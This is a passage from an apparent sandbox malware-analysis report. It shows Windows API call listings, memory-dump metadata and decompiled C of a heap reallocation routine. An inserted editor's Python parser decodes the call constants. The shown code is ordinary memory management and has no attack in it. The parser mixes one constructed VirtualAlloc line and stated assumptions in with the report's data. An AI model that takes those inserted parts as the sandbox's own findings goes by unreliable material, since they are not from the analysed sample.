                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                                                    • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                                                    • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                                                    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 135118572-0
                                                                                    • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                    • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                                                    • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                                                    • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%
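The "APIs" listing above is the part of this report an analyst reads first, but its raw form hides two things: the constants are printed as bare hex (000000F4, 00002010, 00000001), and the argument list is a stack dump that runs past the API's real parameter count (GetStdHandle takes one parameter; the listing prints thirteen values for it). The following parser is an added editor's example, not part of the Joe Sandbox report or of the analysed sample: it turns listing lines into structured records, cuts the argument list at the API's arity, and decodes the constants used by the calls on this page. The sample lines are constructed copies of the entries above plus one VirtualAlloc line that is not from this report (marked as such) to show the executable-memory check; the ARITY table and the stack-residue rule are the author's assumptions about how the listing prints arguments.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample (not parsed from a live report): four entries copied in the shape
# of the "APIs" listing above, one non-API line, and one VirtualAlloc entry that is NOT
# from this report, added only to show how an executable-memory request gets flagged.
SAMPLE_API_LINES = """\
  • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
• MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
Memory Dump Source
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00000000
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

Arg = Optional[int]  # None stands for '?', a value the sandbox did not recover

# Assumption: the listing prints whatever sits on the stack at the call, so values past the
# API's real parameter count are residue, not arguments (GetStdHandle takes one parameter,
# the listing above prints thirteen values for it).
ARITY = {"VirtualQuery": 3, "GetModuleFileNameW": 3, "LoadStringW": 4, "WideCharToMultiByte": 8,
         "GetStdHandle": 1, "WriteFile": 5, "MessageBoxW": 4, "VirtualAlloc": 4}

STD_HANDLES = {0xF6: "STD_INPUT_HANDLE", 0xF5: "STD_OUTPUT_HANDLE", 0xF4: "STD_ERROR_HANDLE"}
MB_TYPE = {0: "MB_OK", 1: "MB_OKCANCEL", 2: "MB_ABORTRETRYIGNORE", 3: "MB_YESNOCANCEL", 4: "MB_YESNO", 5: "MB_RETRYCANCEL"}
MB_ICON = {0x10: "MB_ICONSTOP", 0x20: "MB_ICONQUESTION", 0x30: "MB_ICONEXCLAMATION", 0x40: "MB_ICONINFORMATION"}
MB_MODAL = {0x1000: "MB_SYSTEMMODAL", 0x2000: "MB_TASKMODAL"}
CODEPAGES = {0: "CP_ACP", 1: "CP_OEMCP", 65001: "CP_UTF8"}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


@dataclass
class ApiCall:
    api: str
    dll: str
    ref: int                 # address of the call instruction ("ref:")
    args: List[Arg]          # real parameters, in order
    residue: List[Arg]       # extra stack values printed after the real parameters
    subcall_of: Optional[int] = None   # set for "Part of subcall function X" entries
    decoded: Dict[str, str] = field(default_factory=dict)


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return None


def decode(call: ApiCall) -> Dict[str, str]:
    """Turn the raw constants of the APIs seen on this page into their Win32 names."""
    a, out = call.args, {}
    if call.api == "GetStdHandle" and a and a[0] is not None:
        # The listing prints 000000F4 where the decompiled call passes 0xfffffff4 (-12);
        # both mean STD_ERROR_HANDLE, so match on the low byte only.
        out["nStdHandle"] = STD_HANDLES.get(a[0] & 0xFF, hex(a[0]))
    elif call.api == "MessageBoxW" and len(a) >= 4 and a[3] is not None:
        v = a[3]
        parts = [MB_TYPE.get(v & 0xF, hex(v & 0xF))]
        if v & 0xF0:
            parts.append(MB_ICON.get(v & 0xF0, hex(v & 0xF0)))
        parts += [name for bit, name in MB_MODAL.items() if v & bit]
        out["uType"] = "|".join(parts)
    elif call.api == "WideCharToMultiByte" and a and a[0] is not None:
        out["CodePage"] = CODEPAGES.get(a[0], str(a[0]))
    elif call.api == "VirtualAlloc" and len(a) >= 4:
        if a[2] is not None:
            out["flAllocationType"] = "|".join(n for bit, n in ALLOC_TYPE.items() if a[2] & bit) or hex(a[2])
        if a[3] is not None:
            out["flProtect"] = PROTECT.get(a[3], hex(a[3]))
            if a[3] & 0xF0:  # any PAGE_EXECUTE_* protection: memory that can later run code
                out["note"] = "executable protection requested"
    return out


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings, blank lines and other non-API text
        raw = [parse_arg(t) for t in m["args"].split(",")] if m["args"].strip() else []
        n = ARITY.get(m["api"], len(raw))
        call = ApiCall(api=m["api"], dll=m["dll"], ref=int(m["ref"], 16),
                       args=raw[:n], residue=raw[n:],
                       subcall_of=int(m["sub"], 16) if m["sub"] else None)
        call.decoded = decode(call)
        calls.append(call)
    return calls


def flagged(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls worth a second look when triaging: here, executable memory requests."""
    return [c for c in calls if "note" in c.decoded]
```

Run on the listing for this function, the parser reports the stderr handle, the OEM code page and MB_OK|MB_ICONSTOP|MB_TASKMODAL for the message box, and nothing executable: the two VirtualAlloc calls in the second function below ask for PAGE_READWRITE (4), which is why they are not flagged. The one rule worth keeping in mind when reading any such listing by hand is the residue cut: an argument value that sits past the API's parameter count is a leftover stack slot, not something the sample passed.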

                                                                                    C-Code - Quality: 88%
                                                                                    			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
                                                                                    				signed int __ebx;
                                                                                    				void* __esi;
                                                                                    				signed int _t69;
                                                                                    				signed int _t78;
                                                                                    				signed int _t93;
                                                                                    				long _t94;
                                                                                    				void* _t100;
                                                                                    				signed int _t102;
                                                                                    				signed int _t109;
                                                                                    				signed int _t115;
                                                                                    				signed int _t123;
                                                                                    				signed int _t129;
                                                                                    				void* _t131;
                                                                                    				signed int _t140;
                                                                                    				unsigned int _t148;
                                                                                    				signed int _t150;
                                                                                    				long _t152;
                                                                                    				signed int _t156;
                                                                                    				intOrPtr _t161;
                                                                                    				signed int _t166;
                                                                                    				signed int _t170;
                                                                                    				unsigned int _t171;
                                                                                    				intOrPtr _t174;
                                                                                    				intOrPtr _t192;
                                                                                    				signed int _t195;
                                                                                    				signed int _t196;
                                                                                    				signed int _t197;
                                                                                    				void* _t205;
                                                                                    				unsigned int _t207;
                                                                                    				intOrPtr _t213;
                                                                                    				void* _t225;
                                                                                    				intOrPtr _t227;
                                                                                    				void* _t228;
                                                                                    				signed int _t230;
                                                                                    				void* _t232;
                                                                                    				signed int _t233;
                                                                                    				signed int _t234;
                                                                                    				signed int _t238;
                                                                                    				signed int _t241;
                                                                                    				void* _t243;
                                                                                    				intOrPtr* _t244;
                                                                                    
                                                                                    				// Editor's note: a heap ReallocMem routine. Flag bits in the word just before the block select the
                                                                                    				// path: in-place resize, allocate-copy-free (E00403EE8 / E00403A74 / E0040426C), or growth of an
                                                                                    				// OS-allocated block through VirtualQuery/VirtualAlloc, all under a spinlock on 0x4bbae8.
                                                                                    				_t176 = __edx;
                                                                                    				_t66 = __eax;
                                                                                    				_t166 =  *(__eax - 4); // block header word stored before the user pointer: low 4 bits are flags (tested with & 7, & 5, & 3), the rest is the size (& 0xfffffff0)
                                                                                    				_t217 = __eax;
                                                                                    				if((_t166 & 0x00000007) != 0) {
                                                                                    					__eflags = _t166 & 0x00000005;
                                                                                    					if((_t166 & 0x00000005) != 0) {
                                                                                    						_pop(_t217);
                                                                                    						_pop(_t145);
                                                                                    						__eflags = _t166 & 0x00000003;
                                                                                    						if((_t166 & 0x00000003) == 0) {
                                                                                    							_push(_t145);
                                                                                    							_push(__eax);
                                                                                    							_push(__edi);
                                                                                    							_push(_t225);
                                                                                    							_t244 = _t243 + 0xffffffe0;
                                                                                    							_t218 = __edx;
                                                                                    							_t202 = __eax;
                                                                                    							_t69 =  *(__eax - 4);
                                                                                    							_t148 = (0xfffffff0 & _t69) - 0x14;
                                                                                    							if(0xfffffff0 >= __edx) {
                                                                                    								__eflags = __edx - _t148 >> 1;
                                                                                    								if(__edx < _t148 >> 1) {
                                                                                    									_t150 = E00403EE8(__edx);
                                                                                    									__eflags = _t150;
                                                                                    									if(_t150 != 0) {
                                                                                    										__eflags = _t218 - 0x40a2c;
                                                                                    										if(_t218 > 0x40a2c) {
                                                                                    											_t78 = _t202 - 0x10;
                                                                                    											__eflags = _t78;
                                                                                    											 *((intOrPtr*)(_t78 + 8)) = _t218;
                                                                                    										}
                                                                                    										E00403AA4(_t202, _t218, _t150);
                                                                                    										E0040426C(_t202, _t202, _t225);
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t150 = __eax;
                                                                                    									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
                                                                                    								}
                                                                                    							} else {
                                                                                    								if(0xfffffff0 <= __edx) {
                                                                                    									_t227 = __edx;
                                                                                    								} else {
                                                                                    									_t227 = 0xbadb9d;
                                                                                    								}
                                                                                    								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
                                                                                    								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c); // 0x1c = sizeof(MEMORY_BASIC_INFORMATION) on 32-bit
                                                                                    								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) { // 0x10000 = MEM_FREE: the pages after the block are not free, so it cannot grow in place
                                                                                    									L12:
                                                                                    									_t150 = E00403EE8(_t227);
                                                                                    									__eflags = _t150;
                                                                                    									if(_t150 != 0) {
                                                                                    										__eflags = _t227 - 0x40a2c;
                                                                                    										if(_t227 > 0x40a2c) {
                                                                                    											_t93 = _t150 - 0x10;
                                                                                    											__eflags = _t93;
                                                                                    											 *((intOrPtr*)(_t93 + 8)) = _t218;
                                                                                    										}
                                                                                    										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
                                                                                    										E0040426C(_t202, _t202, _t227);
                                                                                    									}
                                                                                    								} else {
                                                                                    									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
                                                                                    									_t94 =  *(_t244 + 0x10);
                                                                                    									if(_t218 - _t148 >= _t94) {
                                                                                    										goto L12;
                                                                                    									} else {
                                                                                    										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
                                                                                    										if(_t94 < _t152) {
                                                                                    											_t152 = _t94;
                                                                                    										}
                                                                                    										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) { // reserve (0x2000 = MEM_RESERVE) then commit (0x1000 = MEM_COMMIT) the following pages as PAGE_READWRITE (4); no executable memory is requested
                                                                                    											goto L12;
                                                                                    										} else {
                                                                                    											_t100 = _t202 - 0x10;
                                                                                    											 *((intOrPtr*)(_t100 + 8)) = _t218;
                                                                                    											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
                                                                                    											_t150 = _t202;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							return _t150;
                                                                                    						} else {
                                                                                    							__eflags = 0;
                                                                                    							return 0;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t170 = _t166 & 0xfffffff0;
                                                                                    						_push(__edi);
                                                                                    						_t205 = _t170 + __eax;
                                                                                    						_t171 = _t170 - 4;
                                                                                    						_t156 = _t166 & 0x0000000f;
                                                                                    						__eflags = __edx - _t171;
                                                                                    						_push(_t225);
                                                                                    						if(__edx > _t171) {
                                                                                    							_t102 =  *(_t205 - 4);
                                                                                    							__eflags = _t102 & 0x00000001;
                                                                                    							if((_t102 & 0x00000001) == 0) {
                                                                                    								L75:
                                                                                    								asm("adc edi, 0xffffffff");
                                                                                    								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
                                                                                    								_t207 = _t171;
                                                                                    								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
                                                                                    								_t192 = _t176;
                                                                                    								__eflags = _t109;
                                                                                    								if(_t109 == 0) {
                                                                                    									goto L73;
                                                                                    								} else {
                                                                                    									__eflags = _t228 - 0x40a2c;
                                                                                    									if(_t228 > 0x40a2c) {
                                                                                    										 *((intOrPtr*)(_t109 - 8)) = _t192;
                                                                                    									}
                                                                                    									_t230 = _t109;
                                                                                    									E00403A74(_t217, _t207, _t109);
                                                                                    									E0040426C(_t217, _t207, _t230);
                                                                                    									return _t230;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t115 = _t102 & 0xfffffff0;
                                                                                    								_t232 = _t171 + _t115;
                                                                                    								__eflags = __edx - _t232;
                                                                                    								if(__edx > _t232) {
                                                                                    									goto L75;
                                                                                    								} else {
                                                                                    									__eflags =  *0x4bb059;
                                                                                    									if(__eflags == 0) {
                                                                                    										L66:
                                                                                    										__eflags = _t115 - 0xb30;
                                                                                    										if(_t115 >= 0xb30) {
                                                                                    											E00403AC0(_t205);
                                                                                    											_t176 = _t176;
                                                                                    											_t171 = _t171;
                                                                                    										}
                                                                                    										asm("adc edi, 0xffffffff");
                                                                                    										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                                                    										_t195 = _t232 + 4 - _t123;
                                                                                    										__eflags = _t195;
                                                                                    										if(_t195 > 0) {
                                                                                    											 *(_t217 + _t232 - 4) = _t195;
                                                                                    											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
                                                                                    											_t233 = _t123;
                                                                                    											__eflags = _t195 - 0xb30;
                                                                                    											if(_t195 >= 0xb30) {
                                                                                    												__eflags = _t123 + _t217;
                                                                                    												E00403B00(_t123 + _t217, _t171, _t195);
                                                                                    											}
                                                                                    										} else {
                                                                                    											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
                                                                                    											_t233 = _t232 + 4;
                                                                                    										}
                                                                                    										_t234 = _t233 | _t156;
                                                                                    										__eflags = _t234;
                                                                                    										 *(_t217 - 4) = _t234;
                                                                                    										 *0x4bbae8 = 0;
                                                                                    										_t109 = _t217;
                                                                                    										L73:
                                                                                    										return _t109;
                                                                                    									} else {
                                                                                    										while(1) {
                                                                                    											asm("lock cmpxchg [0x4bbae8], ah");
                                                                                    											if(__eflags == 0) {
                                                                                    												break;
                                                                                    											}
                                                                                    											asm("pause");
                                                                                    											__eflags =  *0x4bb989;
                                                                                    											if(__eflags != 0) {
                                                                                    												continue;
                                                                                    											} else {
                                                                                    												Sleep(0);
                                                                                    												_t176 = _t176;
                                                                                    												_t171 = _t171;
                                                                                    												asm("lock cmpxchg [0x4bbae8], ah");
                                                                                    												if(__eflags != 0) {
                                                                                    													Sleep(0xa);
                                                                                    													_t176 = _t176;
                                                                                    													_t171 = _t171;
                                                                                    													continue;
                                                                                    												}
                                                                                    											}
                                                                                    											break;
                                                                                    										}
                                                                                    										_t156 = 0x0000000f &  *(_t217 - 4);
                                                                                    										_t129 =  *(_t205 - 4);
                                                                                    										__eflags = _t129 & 0x00000001;
                                                                                    										if((_t129 & 0x00000001) == 0) {
                                                                                    											L74:
                                                                                    											 *0x4bbae8 = 0;
                                                                                    											goto L75;
                                                                                    										} else {
                                                                                    											_t115 = _t129 & 0xfffffff0;
                                                                                    											_t232 = _t171 + _t115;
                                                                                    											__eflags = _t176 - _t232;
                                                                                    											if(_t176 > _t232) {
                                                                                    												goto L74;
                                                                                    											} else {
                                                                                    												goto L66;
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							__eflags = __edx + __edx - _t171;
                                                                                    							if(__edx + __edx < _t171) {
                                                                                    								__eflags = __edx - 0xb2c;
                                                                                    								if(__edx >= 0xb2c) {
                                                                                    									L41:
                                                                                    									_t32 = _t176 + 0xd3; // 0xbff
                                                                                    									_t238 = (_t32 & 0xffffff00) + 0x30;
                                                                                    									_t174 = _t171 + 4 - _t238;
                                                                                    									__eflags =  *0x4bb059;
                                                                                    									if(__eflags != 0) {
                                                                                    										while(1) {
                                                                                    											asm("lock cmpxchg [0x4bbae8], ah");
                                                                                    											if(__eflags == 0) {
                                                                                    												break;
                                                                                    											}
                                                                                    											asm("pause");
                                                                                    											__eflags =  *0x4bb989;
                                                                                    											if(__eflags != 0) {
                                                                                    												continue;
                                                                                    											} else {
                                                                                    												Sleep(0);
                                                                                    												_t174 = _t174;
                                                                                    												asm("lock cmpxchg [0x4bbae8], ah");
                                                                                    												if(__eflags != 0) {
                                                                                    													Sleep(0xa);
                                                                                    													_t174 = _t174;
                                                                                    													continue;
                                                                                    												}
                                                                                    											}
                                                                                    											break;
                                                                                    										}
                                                                                    										_t156 = 0x0000000f &  *(_t217 - 4);
                                                                                    										__eflags = 0xf;
                                                                                    									}
                                                                                    									 *(_t217 - 4) = _t156 | _t238;
                                                                                    									_t161 = _t174;
                                                                                    									_t196 =  *(_t205 - 4);
                                                                                    									__eflags = _t196 & 0x00000001;
                                                                                    									if((_t196 & 0x00000001) != 0) {
                                                                                    										_t131 = _t205;
                                                                                    										_t197 = _t196 & 0xfffffff0;
                                                                                    										_t161 = _t161 + _t197;
                                                                                    										_t205 = _t205 + _t197;
                                                                                    										__eflags = _t197 - 0xb30;
                                                                                    										if(_t197 >= 0xb30) {
                                                                                    											E00403AC0(_t131);
                                                                                    										}
                                                                                    									} else {
                                                                                    										 *(_t205 - 4) = _t196 | 0x00000008;
                                                                                    									}
                                                                                    									 *((intOrPtr*)(_t205 - 8)) = _t161;
                                                                                    									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
                                                                                    									__eflags = _t161 - 0xb30;
                                                                                    									if(_t161 >= 0xb30) {
                                                                                    										E00403B00(_t217 + _t238, _t174, _t161);
                                                                                    									}
                                                                                    									 *0x4bbae8 = 0;
                                                                                    									return _t217;
                                                                                    								} else {
                                                                                    									__eflags = __edx - 0x2cc;
                                                                                    									if(__edx < 0x2cc) {
                                                                                    										_t213 = __edx;
                                                                                    										_t140 = E00403EE8(__edx);
                                                                                    										__eflags = _t140;
                                                                                    										if(_t140 != 0) {
                                                                                    											_t241 = _t140;
                                                                                    											E00403AA4(_t217, _t213, _t140);
                                                                                    											E0040426C(_t217, _t213, _t241);
                                                                                    											_t140 = _t241;
                                                                                    										}
                                                                                    										return _t140;
                                                                                    									} else {
                                                                                    										_t176 = 0xb2c;
                                                                                    										__eflags = _t171 - 0xb2c;
                                                                                    										if(_t171 <= 0xb2c) {
                                                                                    											goto L37;
                                                                                    										} else {
                                                                                    											goto L41;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							} else {
                                                                                    								L37:
                                                                                    								return _t66;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					__ebx =  *__ecx;
                                                                                    					__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                    					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                                                    					__eflags = __ecx - __edx;
                                                                                    					if(__ecx < __edx) {
                                                                                    						__ecx = __ecx + __ecx + 0x20;
                                                                                    						_push(__edi);
                                                                                    						__edi = __edx;
                                                                                    						__eax = 0;
                                                                                    						__ecx = __ecx - __edx;
                                                                                    						asm("adc eax, 0xffffffff");
                                                                                    						__eax = 0 & __ecx;
                                                                                    						__eax = (0 & __ecx) + __edx;
                                                                                    						__eax = E00403EE8((0 & __ecx) + __edx);
                                                                                    						__eflags = __eax;
                                                                                    						if(__eax != 0) {
                                                                                    							__eflags = __edi - 0x40a2c;
                                                                                    							if(__edi > 0x40a2c) {
                                                                                    								 *(__eax - 8) = __edi;
                                                                                    							}
                                                                                    							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                                                    							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                                                    							__edx = __eax;
                                                                                    							__edi = __eax;
                                                                                    							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
                                                                                    							__eax = __edi;
                                                                                    						}
                                                                                    						_pop(__edi);
                                                                                    						_pop(__esi);
                                                                                    						_pop(__ebx);
                                                                                    						return __eax;
                                                                                    					} else {
                                                                                    						__ebx = 0x40 + __edx * 4;
                                                                                    						__eflags = 0x40 + __edx * 4 - __ecx;
                                                                                    						if(0x40 + __edx * 4 < __ecx) {
                                                                                    							__ebx = __edx;
                                                                                    							__eax = __edx;
                                                                                    							__eax = E00403EE8(__edx);
                                                                                    							__eflags = __eax;
                                                                                    							if(__eax != 0) {
                                                                                    								__ecx = __ebx;
                                                                                    								__edx = __eax;
                                                                                    								__ebx = __eax;
                                                                                    								__esi = E0040426C(__esi, __edi, __ebp);
                                                                                    								__eax = __ebx;
                                                                                    							}
                                                                                    							_pop(__esi);
                                                                                    							_pop(__ebx);
                                                                                    							return __eax;
                                                                                    						} else {
                                                                                    							_pop(__esi);
                                                                                    							_pop(__ebx);
                                                                                    							return __eax;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x004046b4
                                                                                    0x004046b9
                                                                                    0x004046ba
                                                                                    0x004046ba
                                                                                    0x004046c6
                                                                                    0x004046d7
                                                                                    0x004046dd
                                                                                    0x004046dd
                                                                                    0x004046df
                                                                                    0x004046ec
                                                                                    0x004046f3
                                                                                    0x004046f7
                                                                                    0x004046f9
                                                                                    0x004046ff
                                                                                    0x00404701
                                                                                    0x00404703
                                                                                    0x00404703
                                                                                    0x004046e1
                                                                                    0x004046e1
                                                                                    0x004046e5
                                                                                    0x004046e5
                                                                                    0x00404708
                                                                                    0x00404708
                                                                                    0x0040470a
                                                                                    0x0040470d
                                                                                    0x00404714
                                                                                    0x00404716
                                                                                    0x0040471a
                                                                                    0x0040464e
                                                                                    0x0040464e
                                                                                    0x00404653
                                                                                    0x0040465b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040465d
                                                                                    0x0040465f
                                                                                    0x00404666
                                                                                    0x00000000
                                                                                    0x00404668
                                                                                    0x0040466c
                                                                                    0x00404671
                                                                                    0x00404672
                                                                                    0x00404678
                                                                                    0x00404680
                                                                                    0x00404686
                                                                                    0x0040468b
                                                                                    0x0040468c
                                                                                    0x00000000
                                                                                    0x0040468c
                                                                                    0x00404680
                                                                                    0x00000000
                                                                                    0x00404666
                                                                                    0x00404695
                                                                                    0x00404698
                                                                                    0x0040469b
                                                                                    0x0040469d
                                                                                    0x0040471d
                                                                                    0x0040471d
                                                                                    0x00000000
                                                                                    0x0040469f
                                                                                    0x0040469f
                                                                                    0x004046a2
                                                                                    0x004046a5
                                                                                    0x004046a7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004046a7
                                                                                    0x0040469d
                                                                                    0x0040464c
                                                                                    0x0040463f
                                                                                    0x0040451d
                                                                                    0x00404520
                                                                                    0x00404522
                                                                                    0x0040452c
                                                                                    0x00404532
                                                                                    0x00404549
                                                                                    0x00404549
                                                                                    0x00404555
                                                                                    0x0040455b
                                                                                    0x0040455d
                                                                                    0x00404564
                                                                                    0x00404566
                                                                                    0x0040456b
                                                                                    0x00404573
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404575
                                                                                    0x00404577
                                                                                    0x0040457e
                                                                                    0x00000000
                                                                                    0x00404580
                                                                                    0x00404583
                                                                                    0x00404588
                                                                                    0x0040458e
                                                                                    0x00404596
                                                                                    0x0040459b
                                                                                    0x004045a0
                                                                                    0x00000000
                                                                                    0x004045a0
                                                                                    0x00404596
                                                                                    0x00000000
                                                                                    0x0040457e
                                                                                    0x004045a9
                                                                                    0x004045a9
                                                                                    0x004045a9
                                                                                    0x004045ae
                                                                                    0x004045b1
                                                                                    0x004045b3
                                                                                    0x004045b6
                                                                                    0x004045b9
                                                                                    0x004045c4
                                                                                    0x004045c6
                                                                                    0x004045c9
                                                                                    0x004045cb
                                                                                    0x004045cd
                                                                                    0x004045d3
                                                                                    0x004045d5
                                                                                    0x004045d5
                                                                                    0x004045bb
                                                                                    0x004045be
                                                                                    0x004045be
                                                                                    0x004045da
                                                                                    0x004045e0
                                                                                    0x004045e4
                                                                                    0x004045ea
                                                                                    0x004045f1
                                                                                    0x004045f1
                                                                                    0x004045f6
                                                                                    0x00404603
                                                                                    0x00404534
                                                                                    0x00404534
                                                                                    0x0040453a
                                                                                    0x00404604
                                                                                    0x00404608
                                                                                    0x0040460d
                                                                                    0x0040460f
                                                                                    0x00404611
                                                                                    0x00404619
                                                                                    0x00404620
                                                                                    0x00404625
                                                                                    0x00404625
                                                                                    0x0040462b
                                                                                    0x00404540
                                                                                    0x00404540
                                                                                    0x00404545
                                                                                    0x00404547
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404547
                                                                                    0x0040453a
                                                                                    0x00404524
                                                                                    0x00404524
                                                                                    0x00404528
                                                                                    0x00404528
                                                                                    0x00404522
                                                                                    0x00404517
                                                                                    0x00404474
                                                                                    0x00404474
                                                                                    0x00404476
                                                                                    0x0040447a
                                                                                    0x0040447d
                                                                                    0x0040447f
                                                                                    0x004044b8
                                                                                    0x004044bc
                                                                                    0x004044bd
                                                                                    0x004044bf
                                                                                    0x004044c1
                                                                                    0x004044c3
                                                                                    0x004044c6
                                                                                    0x004044c8
                                                                                    0x004044ca
                                                                                    0x004044cf
                                                                                    0x004044d1
                                                                                    0x004044d3
                                                                                    0x004044d9
                                                                                    0x004044db
                                                                                    0x004044db
                                                                                    0x004044e2
                                                                                    0x004044e2
                                                                                    0x004044e5
                                                                                    0x004044e7
                                                                                    0x004044f0
                                                                                    0x004044f5
                                                                                    0x004044f5
                                                                                    0x004044f7
                                                                                    0x004044f8
                                                                                    0x004044f9
                                                                                    0x004044fa
                                                                                    0x00404481
                                                                                    0x00404481
                                                                                    0x00404488
                                                                                    0x0040448a
                                                                                    0x00404490
                                                                                    0x00404492
                                                                                    0x00404494
                                                                                    0x00404499
                                                                                    0x0040449b
                                                                                    0x0040449d
                                                                                    0x0040449f
                                                                                    0x004044a1
                                                                                    0x004044ac
                                                                                    0x004044b1
                                                                                    0x004044b1
                                                                                    0x004044b3
                                                                                    0x004044b4
                                                                                    0x004044b5
                                                                                    0x0040448c
                                                                                    0x0040448c
                                                                                    0x0040448d
                                                                                    0x0040448e
                                                                                    0x0040448e
                                                                                    0x0040448a
                                                                                    0x0040447f

Memory Dump Source
• Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp

Similarity
• API ID:
• String ID:
